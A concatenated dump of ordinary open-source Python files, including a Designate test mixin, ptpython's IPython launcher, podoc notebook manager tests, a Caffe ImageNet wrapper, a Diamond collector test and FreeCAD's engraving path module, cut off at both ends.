return unittest.TestSuite( [dbenchTest( *args, **kwds )] )
if __name__ == "__main__":
if not sys.platform.startswith( "win" ):
result = unittest.TextTestRunner( verbosity=2 ).run( createTestSuite() )
if not result.wasSuccessful():
sys.exit(1)
else:
print sys.modules[__name__].__file__.split( os.sep )[-1], "not supported on Windows"
| bsd-3-clause |
richm/designate | designate/tests/test_backend/__init__.py | 2 | 1043 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from designate import backend
class BackendTestMixin(object):
def get_backend_driver(self):
central_service = self.start_service('central')
return backend.get_backend(cfg.CONF['service:agent'].backend_driver,
central_service=central_service)
def test_constructor(self):
self.get_backend_driver()
| apache-2.0 |
BRAINSia/ITK | Utilities/Maintenance/ParallelStripIncludes.py | 7 | 1662 | #!/usr/bin/python
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
# Author: Pat Marion
# Modified by Xiaoxiao Liu.
## This script is designed to run StriIncludes.py in parallel to significantly reduce
## the processing time for removing unnecessary header includes.
## To run the script you need to edit StripIncludes.py.
## You should also set up the number of processes according to the machine configuration.
from StripIncludes import *
from multiprocessing import Pool
############### Inputs: need edit #############
FILES_PER_PROCESS = 2
NUMBER_OF_PROCESSES = 8
#################################################
def main():
fileList = open(relativeFileList, "r").read().splitlines()
args = []
for i in xrange(0, len(fileList), FILES_PER_PROCESS):
args.append(fileList[i : i + FILES_PER_PROCESS])
pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(processFileList, args)
if __name__ == "__main__":
main()
| apache-2.0 |
eddiemonroe/opencog | opencog/python/pln_old/examples/context/context_agent.py | 32 | 1282 | """
A MindAgent to test the application of the context rules
"""
from opencog.cogserver import MindAgent
from pln.chainers import Chainer
from pln.rules import *
__author__ = 'Sebastian Ruder'
class ContextAgent(MindAgent):
def __init__(self):
self.chainer = None
def create_chainer(self, atomspace):
self.chainer = Chainer(atomspace,
stimulateAtoms=False,
preferAttentionalFocus=False,
allow_output_with_variables=True,
delete_temporary_variables=True)
self.chainer.add_rule(InheritanceToContextRule(self.chainer))
self.chainer.add_rule(EvaluationToContextRule(self.chainer))
self.chainer.add_rule(SubsetToContextRule(self.chainer))
self.chainer.add_rule(ContextToInheritanceRule(self.chainer))
self.chainer.add_rule(ContextToEvaluationRule(self.chainer))
self.chainer.add_rule(ContextToSubsetRule(self.chainer))
self.chainer.add_rule(ContextFreeToSensitiveRule(self.chainer))
def run(self, atomspace):
if self.chainer is None:
self.create_chainer(atomspace)
return
result = self.chainer.forward_step()
return result
| agpl-3.0 |
TNT-Samuel/Coding-Projects | DNS Server/Source - Copy/Lib/site-packages/ptpython/entry_points/run_ptipython.py | 3 | 3109 | #!/usr/bin/env python
"""
ptipython: IPython interactive shell with the `prompt_toolkit` front-end.
Usage:
ptpython [ --vi ]
[ --config-dir=<directory> ] [ --interactive=<filename> ]
[--] [ <arg>... ]
ptpython -h | --help
Options:
--vi : Use Vi keybindings instead of Emacs bindings.
--config-dir=<directory> : Pass config directory. By default '~/.ptpython/'.
-i, --interactive=<filename> : Start interactive shell after executing this file.
"""
from __future__ import absolute_import, unicode_literals
import docopt
import os
import six
import sys
def run(user_ns=None):
a = docopt.docopt(__doc__)
vi_mode = bool(a['--vi'])
config_dir = os.path.expanduser(a['--config-dir'] or os.path.join('~', '.ptpython'))
# Create config directory.
if not os.path.isdir(config_dir) and not os.path.islink(config_dir):
os.mkdir(config_dir)
# If IPython is not available, show message and exit here with error status
# code.
try:
import IPython
except ImportError:
print('IPython not found. Please install IPython (pip install ipython).')
sys.exit(1)
else:
from ptpython.ipython import embed
from ptpython.repl import run_config, enable_deprecation_warnings
# Add the current directory to `sys.path`.
if sys.path[0] != '':
sys.path.insert(0, '')
# When a file has been given, run that, otherwise start the shell.
if a['<arg>'] and not a['--interactive']:
sys.argv = a['<arg>']
six.exec_(compile(open(a['<arg>'][0], "rb").read(), a['<arg>'][0], 'exec'))
else:
enable_deprecation_warnings()
# Create an empty namespace for this interactive shell. (If we don't do
# that, all the variables from this function will become available in
# the IPython shell.)
if user_ns is None:
user_ns = {}
# Startup path
startup_paths = []
if 'PYTHONSTARTUP' in os.environ:
startup_paths.append(os.environ['PYTHONSTARTUP'])
# --interactive
if a['--interactive']:
startup_paths.append(a['--interactive'])
sys.argv = [a['--interactive']] + a['<arg>']
# exec scripts from startup paths
for path in startup_paths:
if os.path.exists(path):
with open(path, 'r') as f:
code = compile(f.read(), path, 'exec')
six.exec_(code, user_ns, user_ns)
else:
print('File not found: {}\n\n'.format(path))
sys.exit(1)
# Apply config file
def configure(repl):
path = os.path.join(config_dir, 'config.py')
if os.path.exists(path):
run_config(repl, path)
# Run interactive shell.
embed(vi_mode=vi_mode,
history_filename=os.path.join(config_dir, 'history'),
configure=configure,
user_ns=user_ns,
title='IPython REPL (ptipython)')
if __name__ == '__main__':
run()
| gpl-3.0 |
rossant/podoc | podoc/notebook/tests/test_manager.py | 2 | 8336 | # -*- coding: utf-8 -*-
"""Tests for the Notebook contents manager.
Taken from https://github.com/jupyter/notebook/blob/master/notebook/services/contents/tests/test_manager.py # noqa
"""
#-------------------------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------------------------
from itertools import combinations
from tempfile import TemporaryDirectory
from tornado.web import HTTPError
import notebook.services.contents.tests.test_manager as tm
from ..manager import PodocContentsManager
# Monkey patch Jupyter's FileContentsManager with podoc's class.
tm.FileContentsManager = PodocContentsManager
#-------------------------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------------------------
class TestPodocFileContentsManager(tm.TestFileContentsManager):
pass
class TestPodocContentsManager(tm.TestContentsManager):
def make_populated_dir(self, api_path):
cm = self.contents_manager
self.make_dir(api_path)
cm.new(path="/".join([api_path, "nb.ipynb"]))
cm.new(path="/".join([api_path, "file.txt"]))
# Ideally this one should *not* be interpreted as an AST...
cm.new(path="/".join([api_path, "file.json"]))
# Add a Markdown file. It should be detected as a notebook.
cm.new(path="/".join([api_path, "markdown.md"]))
def check_populated_dir_files(self, api_path):
dir_model = self.contents_manager.get(api_path)
self.assertEqual(dir_model['path'], api_path)
self.assertEqual(dir_model['type'], "directory")
for entry in dir_model['content']:
if entry['type'] == "directory":
continue
elif entry['type'] == "file":
assert entry['name'] in ('file.txt', 'file.json')
complete_path = "/".join([api_path, entry['name']])
self.assertEqual(entry["path"], complete_path)
elif entry['type'] == "notebook":
# The notebook is either the .ipynb or .md file.
assert entry['name'] in ('nb.ipynb', 'markdown.md')
complete_path = "/".join([api_path, entry['name']])
self.assertEqual(entry["path"], complete_path)
def setUp(self):
self._temp_dir = TemporaryDirectory()
self.td = self._temp_dir.name
self.contents_manager = PodocContentsManager(
root_dir=self.td,
)
def test_get(self):
super(TestPodocContentsManager, self).test_get()
cm = self.contents_manager
# Test in sub-directory
sub_dir = '/foo/'
self.make_dir('foo')
# Use the .md extension.
model = cm.new_untitled(path=sub_dir, ext='.md')
model2 = cm.get(sub_dir + model['name'])
assert isinstance(model2, dict)
self.assertIn('name', model2)
self.assertIn('path', model2)
self.assertIn('content', model2)
self.assertEqual(model2['name'], 'Untitled.md')
self.assertEqual(model2['path'], '{0}/{1}'.format(sub_dir.strip('/'), model['name']))
def test_update_md(self):
cm = self.contents_manager
# Create a notebook
model = cm.new_untitled(type='notebook')
path = model['path']
# Change the name in the model for rename
model['path'] = 'test.md'
model = cm.update(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'test.md')
# Make sure the old name is gone
self.assertRaises(HTTPError, cm.get, path)
# Test in sub-directory
# Create a directory and notebook in that directory
sub_dir = '/foo/'
self.make_dir('foo')
model = cm.new_untitled(path=sub_dir, type='notebook')
path = model['path']
# Change the name in the model for rename
d = path.rsplit('/', 1)[0]
new_path = model['path'] = d + '/test_in_sub.md'
model = cm.update(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'test_in_sub.md')
self.assertEqual(model['path'], new_path)
# Make sure the old name is gone
self.assertRaises(HTTPError, cm.get, path)
def test_save_md(self):
cm = self.contents_manager
# Create a notebook
model = cm.new_untitled(type='notebook', ext='.md')
name = model['name']
path = model['path']
# Get the model with 'content'
full_model = cm.get(path)
# Save the notebook
model = cm.save(full_model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], name)
self.assertEqual(model['path'], path)
# Test in sub-directory
# Create a directory and notebook in that directory
sub_dir = '/foo/'
self.make_dir('foo')
model = cm.new_untitled(path=sub_dir, type='notebook', ext='.md')
name = model['name']
path = model['path']
model = cm.get(path)
# Change the name in the model for rename
model = cm.save(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'Untitled.md')
self.assertEqual(model['path'], 'foo/Untitled.md')
def test_rename_md(self):
cm = self.contents_manager
# Create a new notebook
nb, name, path = self.new_notebook()
# Rename the notebook
cm.rename(path, "changed_path")
# Attempting to get the notebook under the old name raises an error
self.assertRaises(HTTPError, cm.get, path)
# Fetching the notebook under the new name is successful
assert isinstance(cm.get("changed_path"), dict)
# Ported tests on nested directory renaming from pgcontents
all_dirs = ['foo', 'bar', 'foo/bar', 'foo/bar/foo', 'foo/bar/foo/bar']
unchanged_dirs = all_dirs[:2]
changed_dirs = all_dirs[2:]
for _dir in all_dirs:
self.make_populated_dir(_dir)
self.check_populated_dir_files(_dir)
# Renaming to an existing directory should fail
for src, dest in combinations(all_dirs, 2):
with self.assertRaisesHTTPError(409):
cm.rename(src, dest)
# Creating a notebook in a non_existant directory should fail
with self.assertRaisesHTTPError(404):
cm.new_untitled("foo/bar_diff", ext=".md")
cm.rename("foo/bar", "foo/bar_diff")
# Assert that unchanged directories remain so
for unchanged in unchanged_dirs:
self.check_populated_dir_files(unchanged)
# Assert changed directories can no longer be accessed under old names
for changed_dirname in changed_dirs:
with self.assertRaisesHTTPError(404):
cm.get(changed_dirname)
new_dirname = changed_dirname.replace("foo/bar", "foo/bar_diff", 1)
self.check_populated_dir_files(new_dirname)
# Created a notebook in the renamed directory should work
cm.new_untitled("foo/bar_diff", ext=".md")
def test_copy_md(self):
cm = self.contents_manager
parent = u'å b'
name = u'nb √.md'
path = u'{0}/{1}'.format(parent, name)
self.make_dir(parent)
orig = cm.new(path=path)
# copy with unspecified name
copy = cm.copy(path)
self.assertEqual(copy['name'], orig['name'].replace(
'.md', '-Copy1.md'))
# copy with specified name
copy2 = cm.copy(path, u'å b/copy 2.md')
self.assertEqual(copy2['name'], u'copy 2.md')
self.assertEqual(copy2['path'], u'å b/copy 2.md')
# copy with specified path
copy2 = cm.copy(path, u'/')
self.assertEqual(copy2['name'], name)
self.assertEqual(copy2['path'], name)
| bsd-3-clause |
ocefpaf/paegan-transport | setup.py | 2 | 1228 | from __future__ import with_statement
from setuptools import setup, find_packages
from paegan.transport import __version__
def readme():
with open('README.md') as f:
return f.read()
reqs = [line.strip() for line in open('requirements.txt')]
setup(
namespace_packages = ['paegan'],
name = "paegan-transport",
version = __version__,
description = "Particle transport packages for the Paegan library",
long_description = readme(),
license = 'GPLv3',
author = "Kyle Wilcox",
author_email = "kyle@axiomdatascience.com",
url = "https://github.com/axiom-data-science/paegan-transport",
packages = find_packages(),
install_requires = reqs,
classifiers = [
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
],
include_package_data = True,
)
| gpl-3.0 |
rh0dium/django-profiles | profiles/utils.py | 21 | 1467 | """
Utility functions for retrieving and generating forms for the
site-specific user profile model specified in the
``AUTH_PROFILE_MODULE`` setting.
"""
from django import forms
from django.conf import settings
from django.contrib.auth.models import SiteProfileNotAvailable
from django.db.models import get_model
def get_profile_model():
"""
Return the model class for the currently-active user profile
model, as defined by the ``AUTH_PROFILE_MODULE`` setting. If that
setting is missing, raise
``django.contrib.auth.models.SiteProfileNotAvailable``.
"""
if (not hasattr(settings, 'AUTH_PROFILE_MODULE')) or \
(not settings.AUTH_PROFILE_MODULE):
raise SiteProfileNotAvailable
profile_mod = get_model(*settings.AUTH_PROFILE_MODULE.split('.'))
if profile_mod is None:
raise SiteProfileNotAvailable
return profile_mod
def get_profile_form():
"""
Return a form class (a subclass of the default ``ModelForm``)
suitable for creating/editing instances of the site-specific user
profile model, as defined by the ``AUTH_PROFILE_MODULE``
setting. If that setting is missing, raise
``django.contrib.auth.models.SiteProfileNotAvailable``.
"""
profile_mod = get_profile_model()
class _ProfileForm(forms.ModelForm):
class Meta:
model = profile_mod
exclude = ('user',) # User will be filled in by the view.
return _ProfileForm
| bsd-3-clause |
mjmarin/caffe | python/caffe/imagenet/wrapper.py | 20 | 3933 | #!/usr/bin/env python
"""wrapper.py implements an end-to-end wrapper that classifies an image read
from disk, using the imagenet classifier.
"""
import numpy as np
import os
from skimage import io
from skimage import transform
import caffe
IMAGE_DIM = 256
CROPPED_DIM = 227
# Load the imagenet mean file
IMAGENET_MEAN = np.load(
os.path.join(os.path.dirname(__file__), 'ilsvrc_2012_mean.npy'))
def oversample(image, center_only=False):
"""
Oversamples an image. Currently the indices are hard coded to the
4 corners and the center of the image, as well as their flipped ones,
a total of 10 images.
Input:
image: an image of size (256 x 256 x 3) and has data type uint8.
center_only: if True, only return the center image.
Output:
images: the output of size (10 x 3 x 227 x 227)
"""
image = image.swapaxes(1, 2).swapaxes(0, 1)
indices = [0, IMAGE_DIM - CROPPED_DIM]
center = int(indices[1] / 2)
if center_only:
return np.ascontiguousarray(
image[np.newaxis, :, center:center + CROPPED_DIM,
center:center + CROPPED_DIM],
dtype=np.float32)
else:
images = np.empty((10, 3, CROPPED_DIM, CROPPED_DIM), dtype=np.float32)
curr = 0
for i in indices:
for j in indices:
images[curr] = image[:, i:i + CROPPED_DIM, j:j + CROPPED_DIM]
curr += 1
images[4] = image[:, center:center + CROPPED_DIM,
center:center + CROPPED_DIM]
# flipped version
images[5:] = images[:5, :, :, ::-1]
return images
def prepare_image(filename, center_only=False):
img = io.imread(filename)
if img.ndim == 2:
img = np.tile(img[:, :, np.newaxis], (1, 1, 3))
elif img.shape[2] == 4:
img = img[:, :, :3]
# Resize and convert to BGR
img_reshape = (transform.resize(img, (IMAGE_DIM,IMAGE_DIM)) * 255)[:, :, ::-1]
# subtract main
img_reshape -= IMAGENET_MEAN
return oversample(img_reshape, center_only)
class ImageNetClassifier(object):
"""
The ImageNetClassifier is a wrapper class to perform easier deployment
of models trained on imagenet.
"""
def __init__(self, model_def_file, pretrained_model, center_only=False,
num_output=1000):
if center_only:
num = 1
else:
num = 10
self.caffenet = caffe.Net(model_def_file, pretrained_model)
self._output_blobs = [np.empty((num, num_output, 1, 1), dtype=np.float32)]
self._center_only = center_only
def predict(self, filename):
input_blob = [prepare_image(filename, self._center_only)]
self.caffenet.Forward(input_blob, self._output_blobs)
return self._output_blobs[0].mean(0).flatten()
def main(argv):
"""
The main function will carry out classification.
"""
import gflags
import glob
import time
gflags.DEFINE_string("root", "", "The folder that contains images.")
gflags.DEFINE_string("ext", "JPEG", "The image extension.")
gflags.DEFINE_string("model_def", "", "The model definition file.")
gflags.DEFINE_string("pretrained_model", "", "The pretrained model.")
gflags.DEFINE_string("output", "", "The output numpy file.")
gflags.DEFINE_boolean("gpu", True, "use gpu for computation")
FLAGS = gflags.FLAGS
FLAGS(argv)
net = ImageNetClassifier(FLAGS.model_def, FLAGS.pretrained_model)
if FLAGS.gpu:
print 'Use gpu.'
net.caffenet.set_mode_gpu()
files = glob.glob(os.path.join(FLAGS.root, "*." + FLAGS.ext))
files.sort()
print 'A total of %d files' % len(files)
output = np.empty((len(files), net._output_blobs[0].shape[1]),
dtype=np.float32)
start = time.time()
for i, f in enumerate(files):
output[i] = net.predict(f)
if i % 1000 == 0 and i > 0:
print 'Processed %d files, elapsed %.2f s' % (i, time.time() - start)
# Finally, write the results
np.save(FLAGS.output, output)
print 'Done. Saved to %s.' % FLAGS.output
if __name__ == "__main__":
import sys
main(sys.argv)
| bsd-2-clause |
metamx/Diamond | src/collectors/proc/test/testproc.py | 8 | 2268 | #!/usr/bin/python
# coding=utf-8
################################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
try:
from cStringIO import StringIO
StringIO # workaround for pyflakes issue #13
except ImportError:
from StringIO import StringIO
from diamond.collector import Collector
from proc import ProcessStatCollector
################################################################################
class TestProcessStatCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('ProcessStatCollector', {
'interval': 1
})
self.collector = ProcessStatCollector(config, None)
def test_import(self):
self.assertTrue(ProcessStatCollector)
@patch('__builtin__.open')
@patch('os.access', Mock(return_value=True))
@patch.object(Collector, 'publish')
def test_should_open_proc_stat(self, publish_mock, open_mock):
open_mock.return_value = StringIO('')
self.collector.collect()
open_mock.assert_called_once_with('/proc/stat', 'r')
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
ProcessStatCollector.PROC = self.getFixturePath('proc_stat_1')
self.collector.collect()
self.assertPublishedMany(publish_mock, {})
ProcessStatCollector.PROC = self.getFixturePath('proc_stat_2')
self.collector.collect()
metrics = {
'ctxt': 0,
'btime': 1319181102,
'processes': 0,
'procs_running': 1,
'procs_blocked': 0,
'ctxt': 1791,
'btime': 1319181102,
'processes': 2,
'procs_running': 1,
'procs_blocked': 0,
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
################################################################################
if __name__ == "__main__":
unittest.main()
| mit |
maurerpe/FreeCAD | src/Mod/Path/PathScripts/PathEngrave.py | 3 | 15461 | # -*- coding: utf-8 -*-
# ***************************************************************************
# * *
# * Copyright (c) 2014 Yorik van Havre <yorik@uncreated.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
import FreeCAD
import FreeCADGui
import Path
import Draft
from PySide import QtCore, QtGui
from PathScripts import PathUtils
"""Path Engrave object and FreeCAD command"""
# Qt tanslation handling
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def translate(context, text, disambig=None):
return QtGui.QApplication.translate(context, text, disambig)
class ObjectPathEngrave:
def __init__(self, obj):
obj.addProperty("App::PropertyLinkSubList", "Base", "Path", "The base geometry of this object")
obj.addProperty("App::PropertyBool", "Active", "Path", "Make False, to prevent operation from generating code")
obj.addProperty("App::PropertyString", "Comment", "Path", "An optional comment for this profile")
obj.addProperty("App::PropertyString", "UserLabel", "Path", "User Assigned Label")
obj.addProperty("App::PropertyEnumeration", "Algorithm", "Algorithm", "The library or Algorithm used to generate the path")
obj.Algorithm = ['OCC Native']
# Tool Properties
obj.addProperty("App::PropertyIntegerConstraint", "ToolNumber", "Tool", "The tool number in use")
obj.ToolNumber = (0, 0, 1000, 1)
obj.setEditorMode('ToolNumber', 1) # make this read only
obj.addProperty("App::PropertyString", "ToolDescription", "Tool", "The description of the tool ")
obj.setEditorMode('ToolDescription', 1) # make this read onlyt
# Depth Properties
obj.addProperty("App::PropertyDistance", "ClearanceHeight", "Depth", "The height needed to clear clamps and obstructions")
obj.addProperty("App::PropertyDistance", "SafeHeight", "Depth", "Rapid Safety Height between locations.")
obj.addProperty("App::PropertyDistance", "StartDepth", "Depth", "Starting Depth of Tool- first cut depth in Z")
obj.addProperty("App::PropertyDistance", "FinalDepth", "Depth", "Final Depth of Tool- lowest value in Z")
obj.addProperty("App::PropertyInteger", "StartVertex", "Path", "The vertex index to start the path from")
if FreeCAD.GuiUp:
_ViewProviderEngrave(obj.ViewObject)
obj.Proxy = self
def __getstate__(self):
return None
def __setstate__(self, state):
return None
def onChanged(self, obj, prop):
if prop == "UserLabel":
obj.Label = obj.UserLabel + " :" + obj.ToolDescription
def execute(self, obj):
output = ""
if obj.Comment != "":
output += '(' + str(obj.Comment)+')\n'
toolLoad = PathUtils.getLastToolLoad(obj)
if toolLoad is None or toolLoad.ToolNumber == 0:
self.vertFeed = 100
self.horizFeed = 100
self.radius = 0.25
obj.ToolNumber = 0
obj.ToolDescription = "UNDEFINED"
else:
self.vertFeed = toolLoad.VertFeed.Value
self.horizFeed = toolLoad.HorizFeed.Value
tool = PathUtils.getTool(obj, toolLoad.ToolNumber)
self.radius = tool.Diameter/2
obj.ToolNumber = toolLoad.ToolNumber
obj.ToolDescription = toolLoad.Name
if obj.UserLabel == "":
obj.Label = obj.Name + " :" + obj.ToolDescription
else:
obj.Label = obj.UserLabel + " :" + obj.ToolDescription
if obj.Base:
for o in obj.Base:
output += "G0 " + str(obj.ClearanceHeight.Value)+"\n"
# we only consider the outer wire if this is a Face
wires = o[0].Shape.Wires
if obj.Algorithm == "OCC Native":
output += self.buildpathocc(obj, wires)
# print output
if output == "":
output += "G0"
if obj.Active:
path = Path.Path(output)
obj.Path = path
obj.ViewObject.Visibility = True
else:
path = Path.Path("(inactive operation)")
obj.Path = path
obj.ViewObject.Visibility = False
# path = Path.Path(output)
# obj.Path = path
def buildpathocc(self, obj, wires):
import Part
import DraftGeomUtils
output = "G90\nG21\nG40\n"
output += "G0 Z" + str(obj.ClearanceHeight.Value)
# absolute coords, millimeters, cancel offsets
for wire in wires:
offset = wire
# reorder the wire
offset = DraftGeomUtils.rebaseWire(offset, obj.StartVertex)
# we create the path from the offset shape
last = None
for edge in offset.Edges:
if not last:
# we set the first move to our first point
last = edge.Vertexes[0].Point
output += "G0" + " X" + str("%f" % last.x) + " Y" + str("%f" % last.y) # Rapid sto starting position
output += "G1" + " Z" + str("%f" % last.z) + "F " + str(self.vertFeed) + "\n" # Vertical feed to depth
if isinstance(edge.Curve, Part.Circle):
point = edge.Vertexes[-1].Point
if point == last: # edges can come flipped
point = edge.Vertexes[0].Point
center = edge.Curve.Center
relcenter = center.sub(last)
v1 = last.sub(center)
v2 = point.sub(center)
if v1.cross(v2).z < 0:
output += "G2"
else:
output += "G3"
output += " X" + str("%f" % point.x) + " Y" + str("%f" % point.y) + " Z" + str("%f" % point.z)
output += " I" + str("%f" % relcenter.x) + " J" + str("%f" % relcenter.y) + " K" + str("%f" % relcenter.z)
output += " F " + str(self.horizFeed)
output += "\n"
last = point
else:
point = edge.Vertexes[-1].Point
if point == last: # edges can come flipped
point = edge.Vertexes[0].Point
output += "G1 X" + str("%f" % point.x) + " Y" + str("%f" % point.y) + " Z" + str("%f" % point.z)
output += " F " + str(self.horizFeed)
output += "\n"
last = point
output += "G0 Z " + str(obj.SafeHeight.Value)
return output
def addShapeString(self, obj, ss):
baselist = obj.Base
if len(baselist) == 0: # When adding the first base object, guess at heights
try:
bb = ss.Shape.BoundBox # parent boundbox
obj.StartDepth = bb.ZMax
obj.ClearanceHeight = bb.ZMax + 5.0
obj.SafeHeight = bb.ZMax + 3.0
obj.FinalDepth = bb.ZMin
except:
obj.StartDepth = 5.0
obj.ClearanceHeight = 10.0
obj.SafeHeight = 8.0
item = (ss, "")
if item in baselist:
FreeCAD.Console.PrintWarning("ShapeString already in the Engraving list" + "\n")
else:
baselist.append(item)
obj.Base = baselist
self.execute(obj)
class _ViewProviderEngrave:
def __init__(self, vobj):
vobj.Proxy = self
def attach(self, vobj):
self.Object = vobj.Object
return
def setEdit(self, vobj, mode=0):
FreeCADGui.Control.closeDialog()
taskd = TaskPanel()
taskd.obj = vobj.Object
FreeCADGui.Control.showDialog(taskd)
taskd.setupUi()
return True
def getIcon(self):
return ":/icons/Path-Profile.svg"
def __getstate__(self):
return None
def __setstate__(self, state):
return None
class CommandPathEngrave:
def GetResources(self):
return {'Pixmap': 'Path-Engrave',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Path_Engrave", "ShapeString Engrave"),
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Path_Engrave", "Creates an Engraving Path around a Draft ShapeString")}
def IsActive(self):
return FreeCAD.ActiveDocument is not None
def Activated(self):
# if everything is ok, execute and register the transaction in the undo/redo stack
FreeCAD.ActiveDocument.openTransaction("Create Engrave Path")
FreeCADGui.addModule("PathScripts.PathFaceProfile")
FreeCADGui.addModule("PathScripts.PathUtils")
FreeCADGui.doCommand('obj = FreeCAD.ActiveDocument.addObject("Path::FeaturePython", "PathEngrave")')
FreeCADGui.doCommand('PathScripts.PathEngrave.ObjectPathEngrave(obj)')
FreeCADGui.doCommand('obj.ClearanceHeight = 10')
FreeCADGui.doCommand('obj.StartDepth= 0')
FreeCADGui.doCommand('obj.FinalDepth= -0.1')
FreeCADGui.doCommand('obj.SafeHeight= 5.0')
FreeCADGui.doCommand('PathScripts.PathUtils.addToProject(obj)')
FreeCAD.ActiveDocument.commitTransaction()
FreeCAD.ActiveDocument.recompute()
FreeCADGui.doCommand('obj.ViewObject.startEditing()')
class TaskPanel:
def __init__(self):
self.form = FreeCADGui.PySideUic.loadUi(":/panels/EngraveEdit.ui")
def accept(self):
self.getFields()
FreeCADGui.ActiveDocument.resetEdit()
FreeCADGui.Control.closeDialog()
FreeCAD.ActiveDocument.recompute()
FreeCADGui.Selection.removeObserver(self.s)
def reject(self):
FreeCADGui.Control.closeDialog()
FreeCAD.ActiveDocument.recompute()
FreeCADGui.Selection.removeObserver(self.s)
def getFields(self):
if self.obj:
if hasattr(self.obj, "StartDepth"):
self.obj.StartDepth = self.form.startDepth.text()
if hasattr(self.obj, "FinalDepth"):
self.obj.FinalDepth = self.form.finalDepth.text()
if hasattr(self.obj, "SafeHeight"):
self.obj.SafeHeight = self.form.safeHeight.text()
if hasattr(self.obj, "ClearanceHeight"):
self.obj.ClearanceHeight = self.form.clearanceHeight.text()
self.obj.Proxy.execute(self.obj)
def setFields(self):
self.form.startDepth.setText(str(self.obj.StartDepth.Value))
self.form.finalDepth.setText(str(self.obj.FinalDepth.Value))
self.form.safeHeight.setText(str(self.obj.SafeHeight.Value))
self.form.clearanceHeight.setText(str(self.obj.ClearanceHeight.Value))
self.form.baseList.clear()
for i in self.obj.Base:
self.form.baseList.addItem(i[0].Name)
def open(self):
self.s = SelObserver()
# install the function mode resident
FreeCADGui.Selection.addObserver(self.s)
def addBase(self):
# check that the selection contains exactly what we want
selection = FreeCADGui.Selection.getSelectionEx()
if not len(selection) >= 1:
FreeCAD.Console.PrintError(translate("Path_Engrave", "Please select at least one ShapeString\n"))
return
for s in selection:
if not Draft.getType(s.Object) == "ShapeString":
FreeCAD.Console.PrintError(translate("Path_Engrave", "Please select at least one ShapeString\n"))
return
self.obj.Proxy.addShapeString(self.obj, s.Object)
self.setFields()
def deleteBase(self):
dlist = self.form.baseList.selectedItems()
for d in dlist:
newlist = []
for i in self.obj.Base:
if not i[0].Name == d.text():
newlist.append(i)
self.obj.Base = newlist
self.form.baseList.takeItem(self.form.baseList.row(d))
def itemActivated(self):
FreeCADGui.Selection.clearSelection()
slist = self.form.baseList.selectedItems()
for i in slist:
o = FreeCAD.ActiveDocument.getObject(i.text())
FreeCADGui.Selection.addSelection(o)
FreeCADGui.updateGui()
def reorderBase(self):
newlist = []
for i in range(self.form.baseList.count()):
s = self.form.baseList.item(i).text()
obj = FreeCAD.ActiveDocument.getObject(s)
newlist.append(obj)
self.obj.Base = newlist
self.obj.Proxy.execute(self.obj)
FreeCAD.ActiveDocument.recompute()
def getStandardButtons(self):
return int(QtGui.QDialogButtonBox.Ok)
def setupUi(self):
# Connect Signals and Slots
self.form.startDepth.editingFinished.connect(self.getFields)
self.form.finalDepth.editingFinished.connect(self.getFields)
self.form.safeHeight.editingFinished.connect(self.getFields)
self.form.clearanceHeight.editingFinished.connect(self.getFields)
self.form.addBase.clicked.connect(self.addBase)
self.form.deleteBase.clicked.connect(self.deleteBase)
self.form.reorderBase.clicked.connect(self.reorderBase)
self.form.baseList.itemSelectionChanged.connect(self.itemActivated)
sel = FreeCADGui.Selection.getSelectionEx()
if len(sel) != 0:
self.addBase()
self.setFields()
class SelObserver:
def __init__(self):
import PathScripts.PathSelection as PST
PST.engraveselect()
def __del__(self):
import PathScripts.PathSelection as PST
PST.clear()
def addSelection(self, doc, obj, sub, pnt):
